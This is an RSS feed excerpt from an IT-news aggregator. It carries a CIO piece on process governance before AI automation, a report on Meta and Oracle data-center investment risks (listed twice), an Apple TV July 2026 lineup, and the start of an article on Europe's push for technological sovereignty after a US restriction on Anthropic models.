<p>What appeared to be an inefficient process was a process that had accumulated layers of governance without ever being reassembled into a consistent operating model. One approval had been added after an audit finding. Another had been introduced during a restructuring. A third existed because of a past incident. None of those approvals looked unreasonable in isolation. Together, they produced a workflow that nobody owned and with approval layers nobody could justify.</p>



<p>From the CIO’s perspective, this translated into technology sprawl. Unaligned and multiple IT systems were being used to support adjacent parts of the workflow. Software had been purchased to manage steps that shouldn’t have existed in the first place. This meant the entire nature of the automation discussion shifted. The strategic question was no longer which step should be automated first. It was whether those steps deserved to exist at all.</p>



<p>Only after the CIO and I brought the business units together to confront these structural dependencies did the process align and technology become part of the answer. Without that preliminary work, automation would simply have moved a poorly understood process faster while expanding the expensive software estate needed to govern it.</p>



<p>That engagement reinforced my conviction that many workflows presented as automation candidates are not ready for automation because they are not sufficiently coherent to automate.</p>



<h2 class="wp-block-heading">Uncomfortable questions</h2>



<p>Because these questions are operationally and politically sensitive, businesses will try to avoid them and hand the unmapped mess directly to IT. As a strategic partner, the CIO must guide the C-suite through these uncomfortable but necessary inquiries before deploying AI into enterprise workflows:</p>



<ul class="wp-block-list">
<li>Does this process need to exist at all?</li>



<li>Where are decisions actually made in day-to-day practice? Not according to policy documentation, but according to the informal networks of people who actually know how to navigate the exceptions.</li>



<li>Which parts of the workflow exist because of corporate history rather than necessity?</li>



<li>Where do decision rights shift between teams without anyone acknowledging it?</li>
</ul>



<p>AI systems do not handle ambiguities gracefully. Answering these questions upfront determines whether implementing AI will mean genuine savings or simply move organizational incoherence through the enterprise at lightning speed.</p>



<h2 class="wp-block-heading">Three-layer governance</h2>



<p>Governance is the ultimate reason why AI cannot be treated as a traditional technology delivery program with a bit of business input tacked on at the end. Because AI fundamentally alters how enterprise decisions are informed and executed, its deployment must be shaped by an integrated operating and governance framework.</p>



<p>CIOs can evaluate an organization’s true AI readiness based on three interdependent governance layers. By mastering these, the technology stack is protected from being forced to compensate for bad business design.</p>



<ol class="wp-block-list">
<li><strong>Organizational governance. </strong><em>Core questions:</em> Is this workflow genuinely needed, who actually owns it and what risk or quality definitions are binding across separate business functions? This is a cross-departmental leadership question. It must be resolved by the business units first, or IT inevitably inherits the resulting operational complexity.</li>



<li><strong>Endpoint or tool governance. </strong><em>Core questions</em>: How are outputs interpreted when cognitive work is partially or fully delegated to machines? This layer defines exactly where a human-in-the-loop remains mandatory, how exceptions are escalated to specialists and how accountability is maintained when an AI agent makes an optimized operational prediction.</li>



<li><strong>Platform governance. </strong><em>Core questions:</em> What is the foundational security, privacy and technical guardrails? This includes LLM/model selection, vendor standards, data privacy compliance, integration rules and continuous monitoring. Paradoxically, this is the layer most organizations focus on first—yet, because it exists entirely to support the processes and tools above it, it should actually be the last to be set in stone.</li>
</ol>



<p>These layers interlinked. A weakness in one undermines the others. This is where CIOs become strategically important. They are the executives who see when process incoherence is converted into architectural complexity, application sprawl, higher license costs and long-term support burdens. AI decisions without that perspective and organizations will once again confuse digitization with transformation.</p>



<h2 class="wp-block-heading">Case Study 2: A downstream bottleneck and the structural solution</h2>



<p>In another engagement, the business pushed for an AI-driven intake solution. Frontline teams were spending massive amounts of time on repetitive customer data coordination and document verification. On paper, it was an outright victory: IT delivered an AI agent that dropped data extraction times by 85% with an exceptional accuracy rate. In every sense of the word – the pilot was a triumph. And it was phased to implementation.</p>



<p>Within six weeks, the illusion shattered. While the intake layer was now running at lightning speed, the downstream validation process still relied on traditional compliance handoffs, manual fraud checks and legacy database updates. The AI didn’t solve the operational problem; it simply shoved massive volumes of data into a rigid pipeline that was never designed for that velocity.</p>



<p>Escalation queues exploded. The operations team, buried under an unprecedented backlog, began making manual bypass decisions just to keep up, creating immense operational risk.</p>



<p>Rather than allowing IT to be blamed for the downstream chaos, the CIO and I suggested a structural solution. First, we halted further automated intake scaling and used visual process-mapping data to show the rest of the C-suite exactly where the digital pipeline was hitting an analogue wall.</p>



<p>Second, we championed a cross-functional “value stream” redesign. After much negotiation, we managed to leverage the AI’s data-validation outputs to eliminate three manual review steps downstream and replace them with exception-only automated alerts. Finally, we renegotiated the risk-threshold parameters with the legal and compliance teams, shifting accountability from a multi-stage sign-off to a centralized, systemic audit log.</p>



<p>The solution wasn’t adding more software; it was picking the process apart, data point by data point, to align the business rules with machine capabilities. The result was a substantially trimmer, automated end-to-end stream that freed up human resources, allowed redundant software licenses to be safely withdrawn and actually realized the promised financial savings.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Every CIO knows that AI matters. The real challenge facing enterprises whether the executive leadership team is willing to confront what AI inevitably reveals about the fragmented processes, legacy habits and siloed systems organizations have been carrying for decades.</p>



<p>This is why the broad promise of immediate AI savings is overstated. Automation can produce staggering enterprise value, but it cannot create structural coherence on its own. If a workflow is fractured, historically layered and dependent on invisible human intervention, adding AI will not turn it into an efficient system. It will simply scale, cement and automate the weaknesses that were already there.</p>



<p>The CIO’s ultimate responsibility is to ensure that technically incoherent processes do not get permanent residency in the business architecture. This is why the CIO must have a leading seat at the strategic table. Incoherent processes invariably turn into application sprawl, redundant tooling, excess licensing costs, integration debt and massive security exposure.</p>



<p>To avoid this trap, enterprise AI deployment requires cross-departmental leadership willing to examine which work should be automated, which must be completely redesigned and which should be eliminated. </p>



<p>If not, we will simply repeat the costly errors of past technology shifts: preserve the outdated operating logic, throw a shiny new layer of tooling on top and call the expensive result “transformation.” This time, the bill will be significantly larger. Not because AI is mysterious, but because it is brutally efficient at exposing the waste that organizations used to hide inside their people, their processes and their software.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Meta, Oracle moves say about data center economics]]></title>
<description><![CDATA[Hyperscalers continue to invest astronomical amounts in data infrastructure for AI workloads, even as they concede that the massive projects may not pan out as planned.



Oracle, for instance, detailed in its latest 10-K report to the US Securities and Exchange Commission (SEC) all of the ways t...]]></description>
<link>https://tsecurity.de/de/3640069/it-security-nachrichten/what-meta-oracle-moves-say-about-data-center-economics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640069/it-security-nachrichten/what-meta-oracle-moves-say-about-data-center-economics/</guid>
<pubDate>Thu, 02 Jul 2026 05:22:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hyperscalers continue to invest astronomical amounts in data infrastructure for AI workloads, even as they concede that the massive projects may not pan out as planned.</p>



<p>Oracle, for instance, detailed in its <a href="https://d18rn0p25nwr6d.cloudfront.net/CIK-0001341439/0723dfa7-be5f-4227-9da6-eff3cce376a8.pdf" target="_blank" rel="noreferrer noopener">latest 10-K report to the US Securities and Exchange Commission (SEC)</a> all of the ways that these investments could be adversely impacted, potentially making the projects more expensive and extending build-out times.</p>



<p>And Meta, as well as building infrastructure, is purportedly planning to create a new line of business that would generate revenue from excess compute power. An infusion of cash from that venture could return some of its massive investments in data centers and chips to bolster its efforts to develop “<a href="https://www.meta.com/superintelligence/" target="_blank" rel="noreferrer noopener">super intelligence</a>.”</p>



<p>These developments and others indicate that hyperscalers are beginning to optimize their investments for return on AI infrastructure, not just focusing on a data center land grab.</p>



<p>“Both companies recognize that there is huge potential in the buildout, but both have a legal obligation to share material risks that are significant when an industry is spending hundreds of billions of dollars on a capital outlay,” noted <a href="https://www.infotech.com/profiles/jeremy-roberts" target="_blank" rel="noreferrer noopener">Jeremy Roberts</a>, a senior director at Info-Tech Research Group.</p>



<p>He pointed to reports that the top four hyperscalers (Alphabet, Microsoft, Amazon, and Meta) are planning to invest up to <a href="https://www.statista.com/chart/35046/capital-expenditure-of-meta-alphabet-amazon-and-microsoft/" target="_blank" rel="noreferrer noopener">$725 billion this year</a> on AI infrastructure, including data centers, which is “mind-boggling.” </p>



<p>“The datacenter buildout we’re seeing now is unprecedented,” he said.</p>



<h2 class="wp-block-heading">Oracle’s challenges</h2>



<p>In its 10-K report, Oracle detailed its data center investment risks, as required by US federal law. In it, the company concedes that data center construction may <a href="https://www.cio.com/article/4189671/beware-ai-costs-hidden-in-plain-sight.html" target="_blank">cost more or take longer</a> due to supply chain risks, local restrictions on development, or because of failure by third parties to complete on schedule, deliver required equipment and components as promised, fail to pay their bills, or opt not to renew contracts.</p>



<p>Oracle has recently invested heavily in AI and data center infrastructure, notably the <a href="https://www.cio.com/article/4081535/oracles-cloud-strategy-an-increasingly-risky-bet.html" target="_blank">$300 billion Stargate contract</a> with OpenAI. As part of that deal, Oracle is building enormous data centers across the US. The company says it will continue to enter into long-term lease commitments with data center companies and chip and infrastructure suppliers.</p>



<p>However, it warns, “if we underestimate customer demand or our data center capacity needs, we may face shortages of available infrastructure, limiting our ability to support customer growth.”</p>



<p>New customers may not even consider Oracle offerings at all if the company can’t get what it needs for build-outs, the company says. This could leave it with expensive assets that may not be able to be re-leased, re-purposed, or assigned on “acceptable terms, if at all,” it said.</p>



<p>And while Oracle says it has continued to bolster its cloud products and services, it must continue to be able to develop new or “sufficiently differentiated” offerings and enhance those offerings in a timely manner at a competitive price to meet growing demand, it says. The company also must be able to secure data center capacity at affordable rates, and accurately plan for and manage capacity requirements.</p>



<h2 class="wp-block-heading">Meta’s infrastructure plans</h2>



<p>Meta, meanwhile, is continuing its spending spree on AI infrastructure, anonymous sources told <a href="https://www.bloomberg.com/news/articles/2026-07-01/meta-is-building-a-cloud-business-to-sell-excess-ai-compute" target="_blank" rel="noreferrer noopener">Bloomberg</a>. The company is purportedly developing plans for new cloud infrastructure business lines that would sell access to AI computing power and models, putting it in competition with other <a href="https://www.networkworld.com/article/4178809/meta-considers-becoming-a-hyperscaler.html" target="_blank">data center giants</a>.</p>



<p>One potential scenario would have Meta selling access to models, including its new <a href="https://ai.meta.com/blog/introducing-muse-spark-msl/" target="_blank" rel="noreferrer noopener">Muse Spark</a>, hosted on its own AI infrastructure, as well as running the underlying data centers. This model is similar to AWS’ Bedrock offering. Another possibility is Meta selling access to “raw” computing capacity, as do <a href="https://www.networkworld.com/article/4011187/neoclouds-roll-in-challenge-hyperscalers-for-ai-workloads.html" target="_blank">neocloud </a>businesses such as CoreWeave. This move is part of the company’s internal Meta Compute initiative, the sources said.</p>



<p>Like Oracle, Meta has been investing hundreds of billions of dollars in data centers and expensive AI chips. And, according to its <a href="https://www.sec.gov/Archives/edgar/data/1326801/000162828026003942/meta-20251231.htm" target="_blank" rel="noreferrer noopener">latest 10-K</a>: “We plan to continue to significantly expand the size of our infrastructure primarily through data centers, subsea and terrestrial fiber optic cable systems, and other projects.”</p>



<p>Also like Oracle, Meta conceded that these projects are complex and generate exposure to various compliance issues and political challenges. As such, it has “changed, suspended, and terminated” certain projects due to these factors, and will continue to do so if necessary.</p>



<h2 class="wp-block-heading">The view from the enterprise</h2>



<p>For enterprise IT buyers, more competition is probably a good thing in the long term, Roberts noted.</p>



<p>“Advances in data center tech that come about when companies are forced to find every efficiency to stay on top will probably be beneficial,” he said.</p>



<p>However, prices will likely to continue to rise as buildout continues, and anyone making purchasing decisions for components, adjacent products or “basically all hardware” will “feel that pain,” Roberts said.</p>



<p>Those trying to build right now will be competing with hyperscalers who can “pour essentially unlimited funds into construction,” he noted. They will likely have to pay more than they ever have before if they need Nvidia GPUs or high-bandwidth memory from SK Hynix, or even for a crew to plumb and wire a facility.</p>



<p>“I don’t know if this frenzy will cool off any time soon, but now is probably the worst time in recent history to embark on a project like this if you’re a smaller fish in the ocean of AI capital,” Roberts said.</p>



<p>Thus, for this and other reasons, most organizations likely won’t lead their own AI buildouts, he predicted. The successful ones will be those who “effectively optimize AI use, leverage cheaper models, and engage in thoughtful buildouts versus trying to go head-to-head against the richest companies in history in a spending contest.”</p>



<p><em>This article originally appeared on <a href="https://www.cio.com/article/4191940/what-meta-oracle-moves-say-about-data-center-economics.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Meta, Oracle moves say about data center economics]]></title>
<description><![CDATA[Hyperscalers continue to invest astronomical amounts in data infrastructure for AI workloads, even as they concede that the massive projects may not pan out as planned.



Oracle, for instance, detailed in its latest 10-K report to the US Securities and Exchange Commission (SEC) all of the ways t...]]></description>
<link>https://tsecurity.de/de/3640064/it-nachrichten/what-meta-oracle-moves-say-about-data-center-economics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640064/it-nachrichten/what-meta-oracle-moves-say-about-data-center-economics/</guid>
<pubDate>Thu, 02 Jul 2026 05:17:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hyperscalers continue to invest astronomical amounts in data infrastructure for AI workloads, even as they concede that the massive projects may not pan out as planned.</p>



<p>Oracle, for instance, detailed in its <a href="https://d18rn0p25nwr6d.cloudfront.net/CIK-0001341439/0723dfa7-be5f-4227-9da6-eff3cce376a8.pdf" target="_blank" rel="nofollow">latest 10-K report to the US Securities and Exchange Commission (SEC)</a> all of the ways that these investments could be adversely impacted, potentially making the projects more expensive and extending build-out times.</p>



<p>And Meta, as well as building infrastructure, is purportedly planning to create a new line of business that would generate revenue from excess compute power. An infusion of cash from that venture could return some of its massive investments in data centers and chips to bolster its efforts to develop “<a href="https://www.meta.com/superintelligence/" target="_blank" rel="nofollow">super intelligence</a>.”</p>



<p>These developments and others indicate that hyperscalers are beginning to optimize their investments for return on AI infrastructure, not just focusing on a data center land grab.</p>



<p>“Both companies recognize that there is huge potential in the buildout, but both have a legal obligation to share material risks that are significant when an industry is spending hundreds of billions of dollars on a capital outlay,” noted <a href="https://www.infotech.com/profiles/jeremy-roberts" target="_blank" rel="nofollow">Jeremy Roberts</a>, a senior director at Info-Tech Research Group.</p>



<p>He pointed to reports that the top four hyperscalers (Alphabet, Microsoft, Amazon, and Meta) are planning to invest up to <a href="https://www.statista.com/chart/35046/capital-expenditure-of-meta-alphabet-amazon-and-microsoft/" target="_blank" rel="nofollow">$725 billion this year</a> on AI infrastructure, including data centers, which is “mind-boggling.” </p>



<p>“The datacenter buildout we’re seeing now is unprecedented,” he said.</p>



<h2 class="wp-block-heading">Oracle’s challenges</h2>



<p>In its 10-K report, Oracle detailed its data center investment risks, as required by US federal law. In it, the company concedes that data center construction may <a href="https://www.cio.com/article/4189671/beware-ai-costs-hidden-in-plain-sight.html" target="_blank">cost more or take longer</a> due to supply chain risks, local restrictions on development, or because of failure by third parties to complete on schedule, deliver required equipment and components as promised, fail to pay their bills, or opt not to renew contracts.</p>



<p>Oracle has recently invested heavily in AI and data center infrastructure, notably the <a href="https://www.cio.com/article/4081535/oracles-cloud-strategy-an-increasingly-risky-bet.html" target="_blank">$300 billion Stargate contract</a> with OpenAI. As part of that deal, Oracle is building enormous data centers across the US. The company says it will continue to enter into long-term lease commitments with data center companies and chip and infrastructure suppliers.</p>



<p>However, it warns, “if we underestimate customer demand or our data center capacity needs, we may face shortages of available infrastructure, limiting our ability to support customer growth.”</p>



<p>New customers may not even consider Oracle offerings at all if the company can’t get what it needs for build-outs, the company says. This could leave it with expensive assets that may not be able to be re-leased, re-purposed, or assigned on “acceptable terms, if at all,” it said.</p>



<p>And while Oracle says it has continued to bolster its cloud products and services, it must continue to be able to develop new or “sufficiently differentiated” offerings and enhance those offerings in a timely manner at a competitive price to meet growing demand, it says. The company also must be able to secure data center capacity at affordable rates, and accurately plan for and manage capacity requirements.</p>



<h2 class="wp-block-heading">Meta’s infrastructure plans</h2>



<p>Meta, meanwhile, is continuing its spending spree on AI infrastructure, anonymous sources told <a href="https://www.bloomberg.com/news/articles/2026-07-01/meta-is-building-a-cloud-business-to-sell-excess-ai-compute" target="_blank" rel="nofollow">Bloomberg</a>. The company is purportedly developing plans for new cloud infrastructure business lines that would sell access to AI computing power and models, putting it in competition with other <a href="https://www.networkworld.com/article/4178809/meta-considers-becoming-a-hyperscaler.html" target="_blank">data center giants</a>.</p>



<p>One potential scenario would have Meta selling access to models, including its new <a href="https://ai.meta.com/blog/introducing-muse-spark-msl/" target="_blank" rel="nofollow">Muse Spark</a>, hosted on its own AI infrastructure, as well as running the underlying data centers. This model is similar to AWS’ Bedrock offering. Another possibility is Meta selling access to “raw” computing capacity, as do <a href="https://www.networkworld.com/article/4011187/neoclouds-roll-in-challenge-hyperscalers-for-ai-workloads.html" target="_blank">neocloud </a>businesses such as CoreWeave. This move is part of the company’s internal Meta Compute initiative, the sources said.</p>



<p>Like Oracle, Meta has been investing hundreds of billions of dollars in data centers and expensive AI chips. And, according to its <a href="https://www.sec.gov/Archives/edgar/data/1326801/000162828026003942/meta-20251231.htm" target="_blank" rel="nofollow">latest 10-K</a>: “We plan to continue to significantly expand the size of our infrastructure primarily through data centers, subsea and terrestrial fiber optic cable systems, and other projects.”</p>



<p>Also like Oracle, Meta conceded that these projects are complex and generate exposure to various compliance issues and political challenges. As such, it has “changed, suspended, and terminated” certain projects due to these factors, and will continue to do so if necessary.</p>



<h2 class="wp-block-heading">The view from the enterprise</h2>



<p>For enterprise IT buyers, more competition is probably a good thing in the long term, Roberts noted.</p>



<p>“Advances in data center tech that come about when companies are forced to find every efficiency to stay on top will probably be beneficial,” he said.</p>



<p>However, prices will likely to continue to rise as buildout continues, and anyone making purchasing decisions for components, adjacent products or “basically all hardware” will “feel that pain,” Roberts said.</p>



<p>Those trying to build right now will be competing with hyperscalers who can “pour essentially unlimited funds into construction,” he noted. They will likely have to pay more than they ever have before if they need Nvidia GPUs or high-bandwidth memory from SK Hynix, or even for a crew to plumb and wire a facility.</p>



<p>“I don’t know if this frenzy will cool off any time soon, but now is probably the worst time in recent history to embark on a project like this if you’re a smaller fish in the ocean of AI capital,” Roberts said.</p>



<p>Thus, for this and other reasons, most organizations likely won’t lead their own AI buildouts, he predicted. The successful ones will be those who “effectively optimize AI use, leverage cheaper models, and engage in thoughtful buildouts versus trying to go head-to-head against the richest companies in history in a spending contest.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV July 2026: Every New Show and Movie Coming This Month]]></title>
<description><![CDATA[Apple TV July is packed with new and returning titles, including Silo Season 3, Trying Season 5, Lucky, The Dink, and a new Snoopy special. The July lineup starts on Friday, July 3, and continues through Friday, July 31, with sci-fi, comedy, thriller, sports comedy, and family animation.



Here’...]]></description>
<link>https://tsecurity.de/de/3639408/ios-mac-os/apple-tv-july-2026-every-new-show-and-movie-coming-this-month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639408/ios-mac-os/apple-tv-july-2026-every-new-show-and-movie-coming-this-month/</guid>
<pubDate>Wed, 01 Jul 2026 20:22:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV July is packed with new and returning titles, including Silo Season 3, Trying Season 5, Lucky, The Dink, and a new Snoopy special. The July lineup starts on Friday, July 3, and continues through Friday, July 31, with sci-fi, comedy, thriller, sports comedy, and family animation.



Here’s everything coming to Apple TV in July, along with the release date, cast, episode details, and what to expect.



1. Silo Season 3








Episodes: 10 episodes



Start date: July 3, 2026



Finale date: September 4, 2026



Genre: Sci-fi drama



Cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Jessica Henwick, Ashley Zukerman




Plot



Season 3 continues Juliette’s story after her forced cleaning, while the silo deals with rebellion and a new danger. The season also goes back to the “Before Times,” where Helen Drew and Daniel Keene uncover a conspiracy that changes everything.



2. Trying Season 5








Episodes: 8 episodes



Start date: July 8, 2026



Finale date: August 26, 2026



Genre: Comedy



Cast: Esther Smith, Rafe Spall, Scarlett Rayner, Cooper Turner, Charlotte Riley




Plot



Nikki and Jason’s family life gets complicated when Princess and Tyler’s biological mother, Kat, arrives at their doorstep. The new season follows the chaos, emotions, and pressure this brings into their home.



3. The Charlie Brown and Snoopy Show



This guide will help you stream "A Charlie Brown Christmas" on Apple TV+. (Photo Credit: Apple.)




Episodes: 18 episodes



Start date: July 10, 2026



Genre: Kids and family animation



Cast: Peanuts characters




Plot



The classic Peanuts series follows Charlie Brown, Snoopy, and the gang through everyday problems, funny moments, and Snoopy’s wild imagination. It brings older Peanuts stories to Apple TV for family viewing.



4. Lucky








Episodes: Limited series



Start date: July 15, 2026



Finale date: August 19, 2026



Genre: Drama, action, thriller



Cast: Anya Taylor-Joy, Annette Bening, Timothy Olyphant, Aunjanue Ellis-Taylor, Drew Starkey




Plot



Lucky follows a con artist who goes on the run after a multimillion-dollar heist goes wrong. With the FBI and a dangerous crime boss chasing her, she has to face her past while trying to survive.



5. The Dink








Duration: Movie



Release date: July 24, 2026



Genre: Comedy, sports



Cast: Jake Johnson, Ed Harris, Mary Steenburgen, Andy Roddick, Patton Oswalt, Chloe Fineman, Ben Stiller




Plot



Dusty Boyd is a washed-up tennis pro who starts playing pickleball after an old injury keeps him away from tennis. What begins as rehab turns into a fight for his father’s approval, his club’s future, and his own identity.



6. Snoopy Presents: There’s No Place Like Home, Snoopy




Duration: Special



Release date: July 31, 2026



Genre: Kids and family



Cast: Riley Vargas, Terry McGurrin, Rob Tinkler, Kitai O’Garro, Josephine Nisbett




Plot



Snoopy is heartbroken after his doghouse is accidentally sold at a yard sale. Charlie Brown tries to help him find it, and their journey turns into a sweet story about what makes a place feel like home.



Final Thoughts



Apple TV July gives viewers a strong mix of returning favorites, new thrillers, comedy, and family-friendly Peanuts titles. In the US, Apple TV costs $12.99 per month after a 7-day free trial.



What do you plan to watch first on Apple TV this July? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe looks to fight any forced shutdown of AI]]></title>
<description><![CDATA[It was one of the biggest tech headlines in June: Amid the race leading up to the initial public offerings (IPOs) of artificial intelligence (AI) giants, the United States used its “blocking card” to disable Anthropic’s latest models. Citing national security concerns, the Trump Administration fo...]]></description>
<link>https://tsecurity.de/de/3639197/it-nachrichten/europe-looks-to-fight-any-forced-shutdown-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639197/it-nachrichten/europe-looks-to-fight-any-forced-shutdown-of-ai/</guid>
<pubDate>Wed, 01 Jul 2026 18:48:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It was one of the biggest tech headlines in June: Amid the race leading up to the initial public offerings (IPOs) of artificial intelligence (AI) giants, the United States used its “blocking card” to disable <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html" target="_blank">Anthropic’s latest models</a>. Citing national security concerns, the Trump Administration forced the company to prevent non-U.S. citizens (even in the US) from using its most advanced models — the very ones it had just unveiled. Speculation suggests the same thing could happen to OpenAI.</p>



<p>The ban on Anthropic was not <a href="https://www.computerworld.com/article/4191565/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models-2.html">lifted until June 30</a>. The US administration said that, in the intervening weeks, it had worked with the company to “review and approve Fable5 to ensure it aligns with the US government and strengthens US leadership in AI.” For its part, OpenAI confirmed that its next major launch would begin with a preview for “trusted partners ”—a list it has shared with the US government.</p>



<p>Are these companies falling victim to their own marketing — having touted that their models are becoming increasingly intelligent and potentially more dangerous? Or are they collateral damage in an uncertain geopolitical world? Whatever the rationale, the recent moves raise questions in Europe, where <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html" data-type="link" data-id="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">digital sovereignty movements are on the rise</a>.</p>



<p>The sudden shutdown of Fable 5 and Mythos 5 for European companies had a limited direct impact, because the models were so new. As Fernando Maldonado, senior analyst at Foundry Spain, noted: “Hardly anyone here had even started using them yet.” The indirect impact is more far-reaching, because it shows that a forced technological blackout is possible and that Europe has a limited margin for response.</p>



<p>The doomsday scenarios warn that Europe could be headed for a future tech disaster that will have a domino effect on the economy and society. That’s the conclusion of the <a href="https://europe2031.ai/" target="_blank" rel="noreferrer noopener"><em>“Europe 2031”</em></a> report, prepared by a group of European AI researchers, analysts, and investors. “The current trajectory of AI calls for the most ambitious political agenda in the history of postwar Europe,” the report concludes. They argue that Europe has failed to grasp the scale of AI ‘s spread and warn that Europe couldl fall into irrelevance. (The group estimates that, in that scenario, the continent would control only 5% of AI computing by 2031, compared to 80% for the US). There is <a href="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.htm" data-type="link" data-id="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.htm">much talk of sovereignty</a>, but little real-world action so far.</p>



<p>That dystopian vision of the future coexists with other, more nuanced perspectives. But analysts and political scientists point out that AI could yet become an economic and political lever that will shape the future balance of power.</p>



<h2 class="wp-block-heading">The ‘kill switch’ scenario</h2>



<p>The total shutdown “kill switch” option, deemed impossible not so long ago, has established itself as one of the real potential fears in geopolitical risk: it was on the agenda at <a href="https://www.euronews.com/my-europe/2026/06/17/ai-takes-centre-stage-at-g7-as-western-fears-over-us-kill-switch-get-real" target="_blank" rel="noreferrer noopener">the recent G7 meeting</a>. The Anthropic case was seen as a warning. “Technology is increasingly a strategic asset. Europe must be able to act on its own terms,” European Commission spokesperson Thomas Regnier told <em>Euronews</em>. <a href="https://www.reuters.com/legal/litigation/eu-commission-looking-practical-consequences-anthropic-decision-spokesperson-2026-06-14/" target="_blank" rel="noreferrer noopener">Speaking to Reuters</a>, he added, “This event is further proof that Europe must strengthen its technological sovereignty.”</p>



<p>The Anthropic outage “has given ammunition to those who have been calling for investment in technological sovereignty and highlights this geopolitical situation,” said <a href="https://es.linkedin.com/in/beatrizariasg" data-type="link" data-id="https://es.linkedin.com/in/beatrizariasg" target="_blank" rel="noreferrer noopener">Beatriz Arias</a>, director of digital transformation at DigitalES. Arias believes the incident shows that today’s reality requires work in more areas; it is no longer enough to manage telecommunications or standards. Other issues such as interoperability and intellectual property are on the table, as well as “the need to invest more in our own capabilities, without prejudice to our continued commitment to an open model of cooperation and alliances.”</p>



<p>That said, Darío García de Viedma, a researcher in Technology and Digital Policy at the Elcano Royal Institute, does not believe the feared kill switch will be used, “because the US  technology export model depends on companies. Companies are the strong arm of US diplomacy in the technological sphere.” For them to play that tole, they need a global presence. But he does agree that what happened with Anthropic helps “explain this risk to the public” — and incidentally showcase what technological sovereignty is.</p>



<p>Even if a catastrophic blackout doesn’t occur, other problems could still hinder access. Political scientist Amélie Férey explained on <a href="https://www.radiofrance.fr/franceculture/podcasts/l-invite-e-des-matins/guerre-au-moyen-orient-a-qui-profite-cet-accord-7310775" target="_blank" rel="noreferrer noopener"><em>France Culture</em></a> how license prices could gradually rise and drive up costs. Or access to certain features could be gradually restricted. As García de Viedma put it, a moratorium on model access would create a “temporal asymmetry.” Disruptions can occur in “the complex supply chain behind all our technology,” through export controls (something now happening in the chip market) or through the degradation of essential services (such as what could happen with Starlink coverage).</p>



<p>In recent years, the European Union has entered a race in that arena, one that involves symbolic measures well as practical legislative moves. The European Parliament has <a href="https://www.politico.eu/article/european-parliament-ditches-google-for-french-search-engine/" target="_blank" rel="noreferrer noopener">dropped Google as its default search engine</a> and replaced it with the French Qwant. And in early June, the Commission presented its <a href="https://commission.europa.eu/news-and-media/news/strengthening-europes-tech-sovereignty-2026-06-03_en" target="_blank" rel="noreferrer noopener">European Technology Sovereignty Package</a>, which <a href="https://www.computerworld.com/article/4169676/the-european-commission-is-considering-rules-that-would-restrict-u-s-cloud-services.html">addresses, among other issues, AI</a>. They aim to ensure that Europe becomes “a continent of AI, strengthen its digital autonomy, and help build a more sustainable digital future,” while also acknowledging Europe’s technological dependence.</p>



<p>“We cannot afford to depend on others for the technologies that keep our hospitals running, our energy grids stable, and our services secure,” said Commission President Ursula von der Leyen. Specifically, Europe aims to triple the capacity of its data centers over the next five to seven years, boost the adoption of AI, enhance research and innovation, and work on its own development and deployment efforts. The package will now have to go through an approval process to become law and take effect.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/P-069883_00-02_01-ORIGINAL-271239.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Henna Virkkunen y Dan Jørgensen, en la presentación del paquete de soberanía tecnológica de la UE el pasado 3 de junio" class="wp-image-4191473" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><strong>Henna Virkkunen and Dan Jørgensen at the presentation of the EU’s technological sovereignty package on June 3.</strong></p>
</figcaption></figure><p class="imageCredit">UE</p></div>



<h2 class="wp-block-heading">Has Europe done enough?</h2>



<p>The big question is whether what Europe has done — and what it plans to do — will be enough. Are the sovereignty packages sufficient, or are they vague and lacking in concrete details? The Europe 2031 group accuses Europe of making empty promises that don’t translate into tangible results.</p>



